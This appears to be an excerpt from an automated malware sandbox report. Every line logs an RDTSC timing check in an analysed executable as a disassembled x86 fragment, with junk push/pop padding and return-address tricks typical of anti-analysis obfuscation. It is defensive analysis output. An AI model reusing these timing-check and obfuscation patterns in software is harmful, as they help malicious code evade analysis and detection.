Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA0853 second address: FA08B0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4FE915D6A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jng 00007F4FE915D6B2h 0x00000013 jne 00007F4FE915D6ACh 0x00000019 mov bx, 8225h 0x0000001d push 00000000h 0x0000001f mov dword ptr [ebp+122D1B35h], edx 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebp 0x0000002a call 00007F4FE915D6A8h 0x0000002f pop ebp 0x00000030 mov dword ptr [esp+04h], ebp 0x00000034 add dword ptr [esp+04h], 00000018h 0x0000003c inc ebp 0x0000003d push ebp 0x0000003e ret 0x0000003f pop ebp 0x00000040 ret 0x00000041 jg 00007F4FE915D6A9h 0x00000047 push eax 0x00000048 pushad 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA1824 second address: FA182E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4FE9502C5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA182E second address: FA1878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jg 00007F4FE915D6AAh 0x0000000d nop 0x0000000e mov di, dx 0x00000011 movsx ebx, bx 0x00000014 push 00000000h 0x00000016 pushad 0x00000017 add ecx, dword ptr [ebp+122D3B3Ah] 0x0000001d popad 0x0000001e push 00000000h 0x00000020 jmp 00007F4FE915D6B7h 0x00000025 xchg eax, esi 0x00000026 pushad 0x00000027 pushad 0x00000028 je 00007F4FE915D6A6h 0x0000002e pushad 0x0000002f popad 0x00000030 popad 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA1878 second address: FA187E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA187E second address: FA188A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA188A second address: FA1891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA26D8 second address: FA26F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9F92D second address: F9F932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA26F0 second address: FA2739 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F4FE915D6A8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov bh, 3Ah 0x00000029 push 00000000h 0x0000002b sub dword ptr [ebp+122D2D18h], ecx 0x00000031 push 00000000h 0x00000033 sub dword ptr [ebp+122D2C01h], ebx 0x00000039 push eax 0x0000003a pushad 0x0000003b push edi 0x0000003c push edi 0x0000003d pop edi 0x0000003e pop edi 0x0000003f push ebx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9F932 second address: F9F9E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F4FE9502C56h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F4FE9502C5Bh 0x00000014 nop 0x00000015 mov ebx, dword ptr [ebp+122D1B7Bh] 0x0000001b push dword ptr fs:[00000000h] 0x00000022 jmp 00007F4FE9502C66h 0x00000027 mov dword ptr fs:[00000000h], esp 0x0000002e adc edi, 6B37ADDAh 0x00000034 mov eax, dword ptr [ebp+122D1081h] 0x0000003a push 00000000h 0x0000003c push eax 0x0000003d call 00007F4FE9502C58h 0x00000042 pop eax 0x00000043 mov dword ptr [esp+04h], eax 0x00000047 add dword ptr [esp+04h], 00000015h 0x0000004f inc eax 0x00000050 push eax 0x00000051 ret 0x00000052 pop eax 0x00000053 ret 0x00000054 mov di, 0206h 0x00000058 push FFFFFFFFh 0x0000005a push 00000000h 0x0000005c push eax 0x0000005d call 00007F4FE9502C58h 0x00000062 pop eax 0x00000063 mov dword ptr [esp+04h], eax 0x00000067 add dword ptr [esp+04h], 00000016h 0x0000006f inc eax 0x00000070 push eax 0x00000071 ret 0x00000072 pop eax 0x00000073 ret 0x00000074 mov edi, dword ptr [ebp+122D3B02h] 0x0000007a nop 0x0000007b push eax 0x0000007c push edx 0x0000007d jnc 00007F4FE9502C63h 0x00000083 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA09BD second address: FA09C3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA09C3 second address: FA09D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE9502C5Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA0AD5 second address: FA0ADA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA0ADA second address: FA0AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA3788 second address: FA378E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA378E second address: FA37A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jg 00007F4FE9502C6Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F4FE9502C56h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA39E1 second address: FA39F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA39F5 second address: FA39FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F4FE9502C56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA582A second address: FA588A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c jmp 00007F4FE915D6B3h 0x00000011 popad 0x00000012 nop 0x00000013 mov bl, A0h 0x00000015 push 00000000h 0x00000017 cld 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007F4FE915D6A8h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 xchg eax, esi 0x00000035 jmp 00007F4FE915D6AAh 0x0000003a push eax 0x0000003b pushad 0x0000003c jp 00007F4FE915D6ACh 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA4A40 second address: FA4A44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAB152 second address: FAB158 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAB158 second address: FAB166 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAB166 second address: FAB16F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F47FF9 second address: F48001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F48001 second address: F48010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4FE915D6AAh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F48010 second address: F4802C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4FE9502C58h 0x00000008 jmp 00007F4FE9502C5Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4802C second address: F48042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FE915D6B2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB1215 second address: FB1219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB1219 second address: FB121D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB121D second address: FB1256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4FE9502C64h 0x0000000e pushad 0x0000000f jmp 00007F4FE9502C67h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB1256 second address: FB125C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB125C second address: FB1261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB0BF4 second address: FB0C15 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4FE915D6A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F4FE915D6B7h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB6DFB second address: FB6E00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB6E00 second address: FB6E06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB6E06 second address: FB6E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB6E0A second address: FB6E2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB6E2C second address: FB6E58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4FE9502C62h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB6E58 second address: FB6E5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBB016 second address: FBB025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jo 00007F4FE9502C56h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBB025 second address: FBB052 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4FE915D6C0h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F4FE915D6AEh 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F52154 second address: F5218A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C5Ah 0x00000007 pushad 0x00000008 jmp 00007F4FE9502C69h 0x0000000d jmp 00007F4FE9502C5Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBF675 second address: FBF67B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBF67B second address: FBF69B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F4FE9502C6Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBF69B second address: FBF6A5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4FE915D6ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBECC5 second address: FBECEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C5Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F4FE9502C67h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC4414 second address: FC4453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jg 00007F4FE915D6C3h 0x0000000d jmp 00007F4FE915D6ADh 0x00000012 js 00007F4FE915D6ACh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC32F0 second address: FC32F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8B7D4 second address: F8B822 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4FE915D6A8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f cld 0x00000010 lea eax, dword ptr [ebp+1248059Dh] 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F4FE915D6A8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 or edi, dword ptr [ebp+122D3B3Eh] 0x00000036 nop 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F4FE915D6AFh 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8B8AF second address: F8B8CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8B8CB second address: F8B8F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F4FE915D6B8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8BC11 second address: F8BC16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8BC16 second address: F8BC3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8BC3B second address: F8BC40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8BC40 second address: F8BC4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F4FE915D6A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8BD55 second address: F8BD5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8BD5C second address: F8BD66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F4FE915D6A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8BE56 second address: F8BE60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F4FE9502C56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8BFAF second address: F8BFB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8BFB3 second address: F8C00A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e jmp 00007F4FE9502C63h 0x00000013 xchg eax, esi 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F4FE9502C58h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e jmp 00007F4FE9502C60h 0x00000033 nop 0x00000034 pushad 0x00000035 pushad 0x00000036 push edi 0x00000037 pop edi 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8C00A second address: F8C012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8C012 second address: F8C018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8C018 second address: F8C030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F4FE915D6ADh 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8C1A8 second address: F8C1C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4FE9502C5Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8C1C4 second address: F8C1C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8C32A second address: F8C3BA instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4FE9502C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F4FE9502C67h 0x0000000f popad 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F4FE9502C58h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b mov edi, dword ptr [ebp+122D194Fh] 0x00000031 push 00000004h 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007F4FE9502C58h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 0000001Ah 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d nop 0x0000004e jmp 00007F4FE9502C61h 0x00000053 push eax 0x00000054 pushad 0x00000055 push ebx 0x00000056 jno 00007F4FE9502C56h 0x0000005c pop ebx 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8CA4C second address: F8CA6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F4FE915D6AFh 0x0000000d jl 00007F4FE915D6ACh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8CA6B second address: F8CA78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8CA78 second address: F8CA91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4FE915D6ADh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8CA91 second address: F8CABE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4FE9502C58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e pushad 0x0000000f push ecx 0x00000010 jmp 00007F4FE9502C67h 0x00000015 pop ecx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC36F3 second address: FC3713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F4FE915D6B8h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC3713 second address: FC3718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC3718 second address: FC375E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B7h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jnc 00007F4FE915D6A6h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F4FE915D6AAh 0x0000001e jmp 00007F4FE915D6B1h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC375E second address: FC376F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC376F second address: FC377E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jnl 00007F4FE915D6A6h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC3A83 second address: FC3A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC3BBB second address: FC3BC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC3BC1 second address: FC3BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC3BC5 second address: FC3BE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F4FE915D6A6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC8AAB second address: FC8AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
